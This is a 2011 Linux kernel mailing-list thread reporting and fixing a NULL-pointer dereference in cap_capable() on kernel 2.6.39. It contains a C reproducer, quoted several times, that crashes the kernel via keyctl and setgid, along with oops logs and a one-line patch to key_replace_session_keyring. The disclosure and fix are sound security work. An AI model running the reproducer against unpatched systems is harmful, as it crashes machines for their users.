  2011-05-23 18:28     ` Fwd: " Robert Święcki
@ 2011-05-24 19:52       ` Robert Święcki
  2011-05-25  8:28         ` [Security] " Eugene Teo
  0 siblings, 1 reply; 9+ messages in thread
From: Robert Święcki @ 2011-05-24 19:52 UTC (permalink / raw)
  To: linux-kernel; +Cc: security, kees, Tavis Ormandy

And the repro - I think this might be exploitable (user-space NULL ptr
deref at the first glance, in cap_capable() while in sys_setgid()).
Works for me with 2.6.39 and the following config:
http://alt.swiecki.net/linux_kernel/ise-test-2.6.39-kernel-config.txt

It works for me with apparmor loaded, but looking at the code it
should work with SELinux as well (both call cap_capable()). Could be
some regression of http://securitytracker.com/id?1024384

It works with 2.6.39 but not with 2.6.39-rc4. Found with Tavis
Ormandy's http://code.google.com/p/iknowthis/

#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/keyctl.h>
#include <linux/sched.h>

int TH1(void *dummy) {
	syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT);
	syscall(__NR_exit, 0);
}

int main(int argc, char **argv)
{
	char stack[1024 * 32];
	pid_t pid = clone(TH1, stack + sizeof(stack), CLONE_VM, NULL);
	if (pid == -1) {
		perror("clone");
		return -1;
	}
	int status;
	while(waitpid(pid, &status, __WALL) != pid);
	setgid(4286409707);
	return 0;
}

Oops (stacktraces from the previous emails are also valid). Basically
'struct user_namespace *targ_ns' in cap_capable() is NULL.

[  288.431402] CPU 0
[  288.431402] Pid: 875, comm: apparmor Not tainted 2.6.39 #1 Dell
Inc.                 Precision WorkStation 390    /0GH911
[  288.431402] RIP: 0010:[<ffffffff8134cbdf>]  [<ffffffff8134cbdf>]
cap_capable+0x18/0x67
[  288.431402] RSP: 0018:ffff880120d43ec8  EFLAGS: 00010203
[  288.431402] RAX: ffff8801220ee0c0 RBX: 0000000000000001 RCX: 0000000000000006
[  288.431402] RDX: 0000000000000000 RSI: ffff880120ebb600 RDI: 0000000000000006
[  288.431402] RBP: ffff880120d43ec8 R08: 0000000000000001 R09: 000000000000005a
[  288.431402] R10: ffffffff813d42ea R11: 0000000000000246 R12: ffff880120ebb600
[  288.431402] R13: 0000000000000006 R14: ffff8801205aaee0 R15: 0000000000000000
[  288.431402] FS:  00007f919efc2720(0000) GS:ffff88012bc00000(0000)
knlGS:0000000000000000
[  288.431402] CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[  288.431402] CR2: 0000000000000408 CR3: 00000001205de000 CR4: 00000000000006f0
[  288.431402] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  288.431402] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[  288.431402] Process apparmor (pid: 875, threadinfo
ffff880120d42000, task ffff8801205aaee0)
[  288.431402] Stack:
[  288.431402]  ffff880120d43f08 ffffffff81378bfb ffff880120d43ee8
ffff8801205aaee0
[  288.431402]  00000000ff7d6beb ffff880120ebb600 0000000000000000
0000000000000000
[  288.431402]  ffff880120d43f18 ffffffff8134d932 ffff880120d43f38
ffffffff8109d99d
[  288.431402] Call Trace:
[  288.431402]  [<ffffffff81378bfb>] apparmor_capable+0x27/0x61
[  288.431402]  [<ffffffff8134d932>] security_capable+0x2a/0x2c
[  288.431402]  [<ffffffff8109d99d>] ns_capable+0x3a/0x4f
[  288.431402]  [<ffffffff8109da2b>] nsown_capable+0x24/0x29
[  288.431402]  [<ffffffff810a6695>] sys_setgid+0x43/0x8d
[  288.431402]  [<ffffffff81ed4902>] system_call_fastpath+0x16/0x1b
[  288.431402] Code: c1 fe 05 d3 e0 48 63 f6 23 44 b2 38 c9 83 f8 01
19 c0 c3 55 48 89 e5 0f 1f 44 00 00 89 cf 48 81 fa f0 16 a2 82 74 0d
48 8b 46 70
[  288.431402]  39 82 08 04 00 00 74 3d 48 8b 46 70 48 3b 50 60 75 1d 89 f9
[  288.431402] RIP  [<ffffffff8134cbdf>] cap_capable+0x18/0x67
[  288.431402]  RSP <ffff880120d43ec8>
[  288.431402] CR2: 0000000000000408

(gdb) bt
#0  0xffffffff8134cbdf in cap_capable (tsk=<value optimized out>,
cred=0x0, targ_ns=0x0, cap=6, audit=1) at security/commoncap.c:88
#1  0xffffffff81378bfb in apparmor_capable (task=0xffff880120e3aee0,
cred=0xffff88011f540500, ns=<value optimized out>, cap=6, audit=1) at
security/apparmor/lsm.c:144
#2  0xffffffff8134d932 in security_capable (ns=<value optimized out>,
cred=<value optimized out>, cap=<value optimized out>) at
security/security.c:160
#3  0xffffffff8109d99d in ns_capable (ns=<value optimized out>,
cap=<value optimized out>) at kernel/capability.c:381
#4  0xffffffff8109da2b in nsown_capable (cap=<value optimized out>) at
kernel/capability.c:412
#5  0xffffffff810a6695 in sys_setgid (gid=1540) at kernel/sys.c:570
#6  0xffffffff810c1e11 in sys_setgid16 (gid=<value optimized out>) at
kernel/uid16.c:53

-- 
Robert Święcki

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: [Security] Fwd: Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
  2011-05-24 19:52       ` Robert Święcki
@ 2011-05-25  8:28         ` Eugene Teo
  2011-05-25 13:26           ` Robert Święcki
  0 siblings, 1 reply; 9+ messages in thread
From: Eugene Teo @ 2011-05-25  8:28 UTC (permalink / raw)
  To: Robert Święcki
  Cc: linux-kernel, security, kees, Tavis Ormandy, David Howells

Cc'ed David as well.

On Tue, May 24, 2011 at 8:52 PM, Robert Święcki <robert@swiecki.net> wrote:
> And the repro - I think this might be exploitable (user-space NULL ptr
> deref at the first glance, in cap_capable() while in sys_setgid()).
> Works for me with 2.6.39 and the following config:
> http://alt.swiecki.net/linux_kernel/ise-test-2.6.39-kernel-config.txt
>
> It works for me with apparmor loaded, but looking at the code it
> should work with SELinux as well (both call cap_capable()). Could be
> some regression of http://securitytracker.com/id?1024384
>
> It works with 2.6.39 but not with 2.6.39-rc4. Found with Tavis
> Ormandy's http://code.google.com/p/iknowthis/
>
> #include <sys/stat.h>
> #include <sys/wait.h>
> #include <unistd.h>
> #include <sys/syscall.h>
> #include <linux/keyctl.h>
> #include <linux/sched.h>
>
> int TH1(void *dummy) {
>        syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT);
>        syscall(__NR_exit, 0);
> }
>
> int main(int argc, char **argv)
> {
>        char stack[1024 * 32];
>        pid_t pid = clone(TH1, stack + sizeof(stack), CLONE_VM, NULL);
>        if (pid == -1) {
>                perror("clone");
>                return -1;
>        }
>        int status;
>        while(waitpid(pid, &status, __WALL) != pid);
>        setgid(4286409707);
>        return 0;
> }
>
> Oops (stacktraces from the previous emails are also valid). Basically
> 'struct user_namespace *targ_ns' in cap_capable() is NULL.
>
> [  288.431402] CPU 0
> [  288.431402] Pid: 875, comm: apparmor Not tainted 2.6.39 #1 Dell
> Inc.                 Precision WorkStation 390    /0GH911
> [  288.431402] RIP: 0010:[<ffffffff8134cbdf>]  [<ffffffff8134cbdf>]
> cap_capable+0x18/0x67
> [  288.431402] RSP: 0018:ffff880120d43ec8  EFLAGS: 00010203
> [  288.431402] RAX: ffff8801220ee0c0 RBX: 0000000000000001 RCX: 0000000000000006
> [  288.431402] RDX: 0000000000000000 RSI: ffff880120ebb600 RDI: 0000000000000006
> [  288.431402] RBP: ffff880120d43ec8 R08: 0000000000000001 R09: 000000000000005a
> [  288.431402] R10: ffffffff813d42ea R11: 0000000000000246 R12: ffff880120ebb600
> [  288.431402] R13: 0000000000000006 R14: ffff8801205aaee0 R15: 0000000000000000
> [  288.431402] FS:  00007f919efc2720(0000) GS:ffff88012bc00000(0000)
> knlGS:0000000000000000
> [  288.431402] CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
> [  288.431402] CR2: 0000000000000408 CR3: 00000001205de000 CR4: 00000000000006f0
> [  288.431402] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
> [  288.431402] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
> [  288.431402] Process apparmor (pid: 875, threadinfo
> ffff880120d42000, task ffff8801205aaee0)
> [  288.431402] Stack:
> [  288.431402]  ffff880120d43f08 ffffffff81378bfb ffff880120d43ee8
> ffff8801205aaee0
> [  288.431402]  00000000ff7d6beb ffff880120ebb600 0000000000000000
> 0000000000000000
> [  288.431402]  ffff880120d43f18 ffffffff8134d932 ffff880120d43f38
> ffffffff8109d99d
> [  288.431402] Call Trace:
> [  288.431402]  [<ffffffff81378bfb>] apparmor_capable+0x27/0x61
> [  288.431402]  [<ffffffff8134d932>] security_capable+0x2a/0x2c
> [  288.431402]  [<ffffffff8109d99d>] ns_capable+0x3a/0x4f
> [  288.431402]  [<ffffffff8109da2b>] nsown_capable+0x24/0x29
> [  288.431402]  [<ffffffff810a6695>] sys_setgid+0x43/0x8d
> [  288.431402]  [<ffffffff81ed4902>] system_call_fastpath+0x16/0x1b
> [  288.431402] Code: c1 fe 05 d3 e0 48 63 f6 23 44 b2 38 c9 83 f8 01
> 19 c0 c3 55 48 89 e5 0f 1f 44 00 00 89 cf 48 81 fa f0 16 a2 82 74 0d
> 48 8b 46 70
> [  288.431402]  39 82 08 04 00 00 74 3d 48 8b 46 70 48 3b 50 60 75 1d 89 f9
> [  288.431402] RIP  [<ffffffff8134cbdf>] cap_capable+0x18/0x67
> [  288.431402]  RSP <ffff880120d43ec8>
> [  288.431402] CR2: 0000000000000408
>
> (gdb) bt
> #0  0xffffffff8134cbdf in cap_capable (tsk=<value optimized out>,
> cred=0x0, targ_ns=0x0, cap=6, audit=1) at security/commoncap.c:88
> #1  0xffffffff81378bfb in apparmor_capable (task=0xffff880120e3aee0,
> cred=0xffff88011f540500, ns=<value optimized out>, cap=6, audit=1) at
> security/apparmor/lsm.c:144
> #2  0xffffffff8134d932 in security_capable (ns=<value optimized out>,
> cred=<value optimized out>, cap=<value optimized out>) at
> security/security.c:160
> #3  0xffffffff8109d99d in ns_capable (ns=<value optimized out>,
> cap=<value optimized out>) at kernel/capability.c:381
> #4  0xffffffff8109da2b in nsown_capable (cap=<value optimized out>) at
> kernel/capability.c:412
> #5  0xffffffff810a6695 in sys_setgid (gid=1540) at kernel/sys.c:570
> #6  0xffffffff810c1e11 in sys_setgid16 (gid=<value optimized out>) at
> kernel/uid16.c:53
>
> --
> Robert Święcki
>
> _______________________________________________
> Security mailing list
> Security@linux.kernel.org
> http://linux.kernel.org/mailman/listinfo/security
>

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: [Security] Fwd: Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
  2011-05-25  8:28         ` [Security] " Eugene Teo
@ 2011-05-25 13:26           ` Robert Święcki
  2011-05-25 14:44             ` Serge Hallyn
  0 siblings, 1 reply; 9+ messages in thread
From: Robert Święcki @ 2011-05-25 13:26 UTC (permalink / raw)
  To: Eugene Teo
  Cc: linux-kernel, security, kees, Tavis Ormandy, David Howells, serge.hallyn

On Wed, May 25, 2011 at 10:28 AM, Eugene Teo <eugeneteo@kernel.sg> wrote:
> Cc'ed David as well.
>
> On Tue, May 24, 2011 at 8:52 PM, Robert Święcki <robert@swiecki.net> wrote:
>> And the repro - I think this might be exploitable (user-space NULL ptr
>> deref at the first glance, in cap_capable() while in sys_setgid()).
>> Works for me with 2.6.39 and the following config:
>> http://alt.swiecki.net/linux_kernel/ise-test-2.6.39-kernel-config.txt
>>
>> It works for me with apparmor loaded, but looking at the code it
>> should work with SELinux as well (both call cap_capable()). Could be
>> some regression of http://securitytracker.com/id?1024384
>>
>> It works with 2.6.39 but not with 2.6.39-rc4. Found with Tavis
>> Ormandy's http://code.google.com/p/iknowthis/

Given that it doesn't seem to appear in 2.6.39-rc4, and judging by the
names of functions involved, this change looks suspiciously related to
this oops (even if it just made the keyctl problem visible)
http://git.itanic.dy.fi/?p=linux-stable;a=commitdiff;h=47a150edc2ae734c0f4bf50aa19499e23b9a46f8

>> #include <sys/stat.h>
>> #include <sys/wait.h>
>> #include <unistd.h>
>> #include <sys/syscall.h>
>> #include <linux/keyctl.h>
>> #include <linux/sched.h>
>>
>> int TH1(void *dummy) {
>>        syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT);
>>        syscall(__NR_exit, 0);
>> }
>>
>> int main(int argc, char **argv)
>> {
>>        char stack[1024 * 32];
>>        pid_t pid = clone(TH1, stack + sizeof(stack), CLONE_VM, NULL);
>>        if (pid == -1) {
>>                perror("clone");
>>                return -1;
>>        }
>>        int status;
>>        while(waitpid(pid, &status, __WALL) != pid);
>>        setgid(4286409707);
>>        return 0;
>> }
>>
>> Oops (stacktraces from the previous emails are also valid). Basically
>> 'struct user_namespace *targ_ns' in cap_capable() is NULL.
>>
>> [  288.431402] CPU 0
>> [  288.431402] Pid: 875, comm: apparmor Not tainted 2.6.39 #1 Dell
>> Inc.                 Precision WorkStation 390    /0GH911
>> [  288.431402] RIP: 0010:[<ffffffff8134cbdf>]  [<ffffffff8134cbdf>]
>> cap_capable+0x18/0x67
>> [  288.431402] RSP: 0018:ffff880120d43ec8  EFLAGS: 00010203
>> [  288.431402] RAX: ffff8801220ee0c0 RBX: 0000000000000001 RCX: 0000000000000006
>> [  288.431402] RDX: 0000000000000000 RSI: ffff880120ebb600 RDI: 0000000000000006
>> [  288.431402] RBP: ffff880120d43ec8 R08: 0000000000000001 R09: 000000000000005a
>> [  288.431402] R10: ffffffff813d42ea R11: 0000000000000246 R12: ffff880120ebb600
>> [  288.431402] R13: 0000000000000006 R14: ffff8801205aaee0 R15: 0000000000000000
>> [  288.431402] FS:  00007f919efc2720(0000) GS:ffff88012bc00000(0000)
>> knlGS:0000000000000000
>> [  288.431402] CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
>> [  288.431402] CR2: 0000000000000408 CR3: 00000001205de000 CR4: 00000000000006f0
>> [  288.431402] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
>> [  288.431402] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
>> [  288.431402] Process apparmor (pid: 875, threadinfo
>> ffff880120d42000, task ffff8801205aaee0)
>> [  288.431402] Stack:
>> [  288.431402]  ffff880120d43f08 ffffffff81378bfb ffff880120d43ee8
>> ffff8801205aaee0
>> [  288.431402]  00000000ff7d6beb ffff880120ebb600 0000000000000000
>> 0000000000000000
>> [  288.431402]  ffff880120d43f18 ffffffff8134d932 ffff880120d43f38
>> ffffffff8109d99d
>> [  288.431402] Call Trace:
>> [  288.431402]  [<ffffffff81378bfb>] apparmor_capable+0x27/0x61
>> [  288.431402]  [<ffffffff8134d932>] security_capable+0x2a/0x2c
>> [  288.431402]  [<ffffffff8109d99d>] ns_capable+0x3a/0x4f
>> [  288.431402]  [<ffffffff8109da2b>] nsown_capable+0x24/0x29
>> [  288.431402]  [<ffffffff810a6695>] sys_setgid+0x43/0x8d
>> [  288.431402]  [<ffffffff81ed4902>] system_call_fastpath+0x16/0x1b
>> [  288.431402] Code: c1 fe 05 d3 e0 48 63 f6 23 44 b2 38 c9 83 f8 01
>> 19 c0 c3 55 48 89 e5 0f 1f 44 00 00 89 cf 48 81 fa f0 16 a2 82 74 0d
>> 48 8b 46 70
>> [  288.431402]  39 82 08 04 00 00 74 3d 48 8b 46 70 48 3b 50 60 75 1d 89 f9
>> [  288.431402] RIP  [<ffffffff8134cbdf>] cap_capable+0x18/0x67
>> [  288.431402]  RSP <ffff880120d43ec8>
>> [  288.431402] CR2: 0000000000000408
>>
>> (gdb) bt
>> #0  0xffffffff8134cbdf in cap_capable (tsk=<value optimized out>,
>> cred=0x0, targ_ns=0x0, cap=6, audit=1) at security/commoncap.c:88
>> #1  0xffffffff81378bfb in apparmor_capable (task=0xffff880120e3aee0,
>> cred=0xffff88011f540500, ns=<value optimized out>, cap=6, audit=1) at
>> security/apparmor/lsm.c:144
>> #2  0xffffffff8134d932 in security_capable (ns=<value optimized out>,
>> cred=<value optimized out>, cap=<value optimized out>) at
>> security/security.c:160
>> #3  0xffffffff8109d99d in ns_capable (ns=<value optimized out>,
>> cap=<value optimized out>) at kernel/capability.c:381
>> #4  0xffffffff8109da2b in nsown_capable (cap=<value optimized out>) at
>> kernel/capability.c:412
>> #5  0xffffffff810a6695 in sys_setgid (gid=1540) at kernel/sys.c:570
>> #6  0xffffffff810c1e11 in sys_setgid16 (gid=<value optimized out>) at
>> kernel/uid16.c:53

-- 
Robert Święcki

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: [Security] Fwd: Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
  2011-05-25 13:26           ` Robert Święcki
@ 2011-05-25 14:44             ` Serge Hallyn
  2011-05-25 14:52               ` Serge Hallyn
  2011-05-25 15:07               ` Robert Święcki
  0 siblings, 2 replies; 9+ messages in thread
From: Serge Hallyn @ 2011-05-25 14:44 UTC (permalink / raw)
  To: Robert Święcki
  Cc: Eugene Teo, linux-kernel, security, kees, Tavis Ormandy, David Howells

Quoting Robert Święcki (robert@swiecki.net):
> On Wed, May 25, 2011 at 10:28 AM, Eugene Teo <eugeneteo@kernel.sg> wrote:
> > Cc'ed David as well.
> >
> > On Tue, May 24, 2011 at 8:52 PM, Robert Święcki <robert@swiecki.net> wrote:
> >> And the repro - I think this might be exploitable (user-space NULL ptr
> >> deref at the first glance, in cap_capable() while in sys_setgid()).
> >> Works for me with 2.6.39 and the following config:
> >> http://alt.swiecki.net/linux_kernel/ise-test-2.6.39-kernel-config.txt
> >>
> >> It works for me with apparmor loaded, but looking at the code it
> >> should work with SELinux as well (both call cap_capable()). Could be
> >> some regression of http://securitytracker.com/id?1024384
> >>
> >> It works with 2.6.39 but not with 2.6.39-rc4. Found with Tavis
> >> Ormandy's http://code.google.com/p/iknowthis/
> 
> Given that it doesn't seem to appear in 2.6.39-rc4, and judging by the
> names of functions involved, this change looks suspiciously related to
> this oops (even if it just made the keyctl problem visible)
> http://git.itanic.dy.fi/?p=linux-stable;a=commitdiff;h=47a150edc2ae734c0f4bf50aa19499e23b9a46f8
> 
> >> #include <sys/stat.h>
> >> #include <sys/wait.h>
> >> #include <unistd.h>
> >> #include <sys/syscall.h>
> >> #include <linux/keyctl.h>
> >> #include <linux/sched.h>
> >>
> >> int TH1(void *dummy) {
> >>        syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT);

Thanks!

Fooi, it looks like all users of cred_alloc_blank() may need to be
audited wrt commit 47a150edc2ae734c0f4bf50aa19499e23b9a46f8.

Does this fix the bug you're seeing?

From: Serge E. Hallyn <serge.hallyn@canonical.com>
Date: Wed, 25 May 2011 15:41:23 +0100
Subject: [PATCH 1/1] Set cred->user_ns in key_replace_session_keyring

Since this cred was not created with copy_creds(), it needs to get
initialized.

Signed-off-by: Serge E. Hallyn <serge.hallyn@canonical.com>
---
 security/keys/process_keys.c |    1 +
 1 files changed, 1 insertions(+), 0 deletions(-)

diff --git a/security/keys/process_keys.c b/security/keys/process_keys.c
index 6c0480d..92a3a5d 100644
--- a/security/keys/process_keys.c
+++ b/security/keys/process_keys.c
@@ -847,6 +847,7 @@ void key_replace_session_keyring(void)
 	new-> sgid	= old-> sgid;
 	new->fsgid	= old->fsgid;
 	new->user	= get_uid(old->user);
+	new->user_ns	= new->user->user_ns;
 	new->group_info	= get_group_info(old->group_info);
 
 	new->securebits	= old->securebits;
-- 
1.7.0.4


^ permalink raw reply related	[flat|nested] 9+ messages in thread

* Re: [Security] Fwd: Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
  2011-05-25 14:44             ` Serge Hallyn
@ 2011-05-25 14:52               ` Serge Hallyn
  2011-05-25 15:07               ` Robert Święcki
  1 sibling, 0 replies; 9+ messages in thread
From: Serge Hallyn @ 2011-05-25 14:52 UTC (permalink / raw)
  To: Robert Święcki
  Cc: Eugene Teo, linux-kernel, security, kees, Tavis Ormandy, David Howells

Quoting Serge Hallyn (serge.hallyn@canonical.com):
> Fooi, it looks like all users of cred_alloc_blank() may need to be
> audited wrt commit 47a150edc2ae734c0f4bf50aa19499e23b9a46f8.

Fortunately there appear to be no other users.

David, is there any other place that a cred gets created and used
without it coming from copy_creds()?

thanks,
-serge

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: [Security] Fwd: Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
  2011-05-25 14:44             ` Serge Hallyn
  2011-05-25 14:52               ` Serge Hallyn
@ 2011-05-25 15:07               ` Robert Święcki
  2011-05-25 15:28                 ` Serge Hallyn
  1 sibling, 1 reply; 9+ messages in thread
From: Robert Święcki @ 2011-05-25 15:07 UTC (permalink / raw)
  To: Serge Hallyn
  Cc: Eugene Teo, linux-kernel, security, kees, Tavis Ormandy, David Howells

>> Given that it doesn't seem to appear in 2.6.39-rc4, and judging by the
>> names of functions involved, this change looks suspiciously related to
>> this oops (even if it just made the keyctl problem visible)
>> http://git.itanic.dy.fi/?p=linux-stable;a=commitdiff;h=47a150edc2ae734c0f4bf50aa19499e23b9a46f8
>>
>> >> #include <sys/stat.h>
>> >> #include <sys/wait.h>
>> >> #include <unistd.h>
>> >> #include <sys/syscall.h>
>> >> #include <linux/keyctl.h>
>> >> #include <linux/sched.h>
>> >>
>> >> int TH1(void *dummy) {
>> >>        syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT);
>
> Thanks!
>
> Fooi, it looks like all users of cred_alloc_blank() may need to be
> audited wrt commit 47a150edc2ae734c0f4bf50aa19499e23b9a46f8.
>
> Does this fix the bug you're seeing?

Yup, the kernel survives both the testcase and a short syscall fuzzing
session. Thanks.

> From: Serge E. Hallyn <serge.hallyn@canonical.com>
> Date: Wed, 25 May 2011 15:41:23 +0100
> Subject: [PATCH 1/1] Set cred->user_ns in key_replace_session_keyring
>
> Since this cred was not created with copy_creds(), it needs to get
> initialized.
>
> Signed-off-by: Serge E. Hallyn <serge.hallyn@canonical.com>
> ---
>  security/keys/process_keys.c |    1 +
>  1 files changed, 1 insertions(+), 0 deletions(-)
>
> diff --git a/security/keys/process_keys.c b/security/keys/process_keys.c
> index 6c0480d..92a3a5d 100644
> --- a/security/keys/process_keys.c
> +++ b/security/keys/process_keys.c
> @@ -847,6 +847,7 @@ void key_replace_session_keyring(void)
>        new-> sgid      = old-> sgid;
>        new->fsgid      = old->fsgid;
>        new->user       = get_uid(old->user);
> +       new->user_ns    = new->user->user_ns;
>        new->group_info = get_group_info(old->group_info);
>
>        new->securebits = old->securebits;
> --
> 1.7.0.4

-- 
Robert Święcki

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: [Security] Fwd: Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
  2011-05-25 15:07               ` Robert Święcki
@ 2011-05-25 15:28                 ` Serge Hallyn
  0 siblings, 0 replies; 9+ messages in thread
From: Serge Hallyn @ 2011-05-25 15:28 UTC (permalink / raw)
  To: Robert Święcki
  Cc: Eugene Teo, linux-kernel, security, kees, Tavis Ormandy, David Howells

Quoting Robert Święcki (robert@swiecki.net):
> >> Given that it doesn't seem to appear in 2.6.39-rc4, and judging by the
> >> names of functions involved, this change looks suspiciously related to
> >> this oops (even if it just made the keyctl problem visible)
> >> http://git.itanic.dy.fi/?p=linux-stable;a=commitdiff;h=47a150edc2ae734c0f4bf50aa19499e23b9a46f8
> >>
> >> >> #include <sys/stat.h>
> >> >> #include <sys/wait.h>
> >> >> #include <unistd.h>
> >> >> #include <sys/syscall.h>
> >> >> #include <linux/keyctl.h>
> >> >> #include <linux/sched.h>
> >> >>
> >> >> int TH1(void *dummy) {
> >> >>        syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT);
> >
> > Thanks!
> >
> > Fooi, it looks like all users of cred_alloc_blank() may need to be
> > audited wrt commit 47a150edc2ae734c0f4bf50aa19499e23b9a46f8.
> >
> > Does this fix the bug you're seeing?
> 
> Yup, the kernel survives both the testcase and a short syscall fuzzing
> session. Thanks.

Thanks, Robert.

David, assuming this gets your ack, do you mind pushing this one forward?

thanks,
-serge

^ permalink raw reply	[flat|nested] 9+ messages in thread

end of thread, other threads:[~2011-05-25 15:28 UTC | newest]

Thread overview: 9+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2011-05-23 14:48 Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values Robert Święcki
     [not found] ` <BANLkTikey3L4doiHY=__=690TZNsXqRHUQ@mail.gmail.com>
     [not found]   ` <alpine.DEB.2.00.1105231133580.29047@router.home>
2011-05-23 18:28     ` Fwd: " Robert Święcki
2011-05-24 19:52       ` Robert Święcki
2011-05-25  8:28         ` [Security] " Eugene Teo
2011-05-25 13:26           ` Robert Święcki
2011-05-25 14:44             ` Serge Hallyn
2011-05-25 14:52               ` Serge Hallyn
2011-05-25 15:07               ` Robert Święcki
2011-05-25 15:28                 ` Serge Hallyn

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.